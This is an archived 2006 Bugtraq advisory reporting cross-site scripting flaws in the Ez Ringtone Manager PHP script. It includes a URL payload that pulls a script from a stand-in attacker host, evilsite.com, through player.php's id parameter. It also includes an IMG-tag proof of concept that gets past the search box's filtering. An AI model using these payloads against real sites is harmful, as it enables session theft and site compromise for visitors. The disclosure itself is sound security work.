Ez Ringtone Manager from scriptez.net - XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Ez Ringtone Manager from scriptez.net - XSS
From: luny@xxxxxxxxxxxxxxx
Date: 8 Jun 2006 00:49:10 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Ez Ringtone Manager

Homepage:
http://www.scriptsez.net

Effected files:
player.php
search input box.

XSS Vulnerabilities:

http://example.com/ringtones/player.php?action=preview&id=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>&cat=LG%20Mobiles

The search box doesnt properlly filter user input. Tags like <script> are 
filtered, and backslashes are added for ' and " 

We can get around this by simply using a <img> tag and &#0000039 for '. Poc:
<IMG SRC=javascript:alert(&#0000039XSS&#0000039)>

Prev by Date: [MajorSecurity #10]i.List <= 1.5 - XSS
Next by Date: GUESTEX guestbook code execution
Previous by thread: [MajorSecurity #10]i.List <= 1.5 - XSS
Next by thread: GUESTEX guestbook code execution
Index(es):
- Date
- Thread